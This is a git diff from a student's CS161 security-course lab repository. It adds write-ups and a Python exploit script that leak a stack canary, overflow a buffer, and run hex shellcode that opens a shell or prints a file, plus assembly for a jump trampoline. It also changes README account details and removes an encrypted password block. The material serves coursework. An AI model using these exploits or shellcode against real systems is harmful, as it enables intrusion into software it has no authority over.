diff --git a/README.md b/README.md
index 06d46bb44c8149237b0edb3ce03f89233c00526e..63ca6e85e34673a4bf2590fd197174b4184107f7 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,5 @@
# cs161
+
ucb cs161 labs
Course website: http://www-inst.eecs.berkeley.edu/~cs161/sp19/
@@ -7,33 +8,9 @@ Course website: http://www-inst.eecs.berkeley.edu/~cs161/sp19/
https://acropolis.cs.berkeley.edu/~account/webacct/
-Account: cs164-ace
-
-Password:
-
-```
------BEGIN PGP MESSAGE-----
-
-hQIMA6EZKPzHVYaOAQ/+JCpketz1mF7XNV63fhDfF2PYHLU4HoDjA63gRyBnhj2h
-CRVxVF6gRpQhO7yV6YGUEX+w3wIfusRlTml2OAKSmV1dYUtFsP+jvrpac9CmWVhs
-UmB1PR0+YaVZZOIUASuj7cCCPkulUccVWhMGc3soB86hnRj/1zJAGTwIZE5l2x7m
-+xzOGSK8wg42j1a69J5bkZ7gIyzRd/9RYePrbvttvDhELeJeWZiTG/hhL4i1wrWA
-KdR+N0FzwUMNpa5WiHgZhkXOmfVOVcIJBiS7M7c03NTXocqpM8T/3JfwyrGd99Nh
-M7fiwBGpITzGyxPmy/2YIOuCw+EodLTqPNKzwof7VuWh832r8YpwLqeRxFvSdvEJ
-fvMAyqV8CzwB3VNzUDTULd6MMyHZI3nThP9WZPegkjBgLF0ucD30Q63wNRvAd6po
-VVOEepzrAfEtX0ek/me88cRRceBZIhFx1CQMDKZB0blgu59eqGNEtVEs9tck13kl
-qo5ZP6W+SMoCs2RJipVgKP3MnKBFMSj0GuzewSpYpm2XAjK7TS3lLGmlps0+Ok6r
-Ciley/Ns3c7miMcKYn+EVPoZ1J59RWbnxN8xpPoScafryAFYMeGLqtqerAVuj4tv
-5zpixrE3iqwt+3nL4hKdzmwUHywhAJvPclIwUxT9SqY5sFS8ZH5xheO4N1v97SLS
-tgE6esur88tbMaTY8oUOQ3NJ9uFAmrOs9IewRptTZwIQksEzJhjnMegdCm3MPbGX
-6hM/ukIMgA77zzwDiJcZB00NTjk0pFCmdpqVpa2bRYPvDRmIgifIbdsPTtaMNp9j
-YVfeaoGUpN+YWPy/08gpz7/dCl+dMCjzx/5ZXQy1mc8lIu/f9Wh7kJJ8G7cN6CC9
-3TK4iuR3wZ6HbH3R+cljhtgMfOcutTWdrEB+erR4J+setOfWihXs
-=tuDB
------END PGP MESSAGE-----
-```
-
-to change the password: `ssh update.cs.berkeley.edu`
+Account: cs161-atw
+
+To change the password: `ssh update.cs.berkeley.edu`
diff --git a/proj1/161-proj1-5.png b/proj1/161-proj1-5.png
new file mode 100644
index 0000000000000000000000000000000000000000..229d6b14563f7cf5e9df7ef4fa065a645dee6fce
Binary files /dev/null and b/proj1/161-proj1-5.png differ
diff --git a/proj1/explain.md b/proj1/explain.md
index 5b19774640a61d63d0df3b56783bde6a2edf598f..6ab1d7b91eb56ba63acdb08ceeab08c1b7735d84 100644
--- a/proj1/explain.md
+++ b/proj1/explain.md
@@ -223,6 +223,11 @@ with open('/dev/fd/1','wb') as f:
## 4
+The solution is easy. Since BUFLEN=16, I send `0123456789ab\x`, then dehexify skips the `\0` and prints everything in canary area.
+
+Now I construct a message with 16 junk characters to fill the buffer, correct canary, another 8 characters to shift ebp & other staffes, and the return address, then the shellcode.
+
+
## 5
- motivation
@@ -266,8 +271,22 @@ However, we need a fixed-address writable page to put `%ebp`. The page `0x080480
Please see the image below. The procedure is too complicated to explain.
+
+Because I have 40 bytes ahead for payload, I can put a shellcode to launch /bin/sh directly. But if I want to create tcp server, I have to write a simple payload and jmp to `&buf+68`. The simple payload is attached below.
+
+```
+// get current addr
+call foo
+foo:
+pop %eax
+
+// 40 + 4+4+4+4+4+4+4 - 5
+add $63, %eax
+jmp *%eax
+```
+I put 5 `nop` at `&buf+68` to make it work even if I have made a mistake.
diff --git a/proj1/solution/interact4 b/proj1/solution/interact4
index 2d70f7bd9702d4cfb9d486cc96a42dba083fab98..b14540e17fdf8be5cf877553b749c5501e9729ed 100755
--- a/proj1/solution/interact4
+++ b/proj1/solution/interact4
@@ -47,17 +47,19 @@ canary = reply_canary
fill2 = "\0"*8
retaddr = fuck_raddr("bffffaf4") # "bffffaf4"
#payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f2f6c73682f62696e545b505389e131d2b00bcd800a", False) # SHELLCODE
+# This payload works! It cat README to stdout. Uncomment print(p.recvline()) to use it.
payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f636174682f62696e545b506841444d45682f2f524568652f6a7a682f686f6d545950515389e131d2b00bcd80", False) # SHELLCODE
-#payload = SHELLCODE
+# This payload also works! It cat README to stderr.
+payload = SHELLCODE + '\0'
msg = fill1 + canary + fill2 + retaddr + payload + '\n'
#print(msg)
p.send(msg)
-print(p.recvline())
-print(p.recvline())
-print(p.recvline())
-print(p.recvline())
-print(p.recvline())
+#print(p.recvline())
+#print(p.recvline())
+#print(p.recvline())
+#print(p.recvline())
+##print(p.recvline())
# HINT: the last line of your exploit should look something like:
# p.send('A' * m + canary + 'B' * n + rip + SHELLCODE + '\n')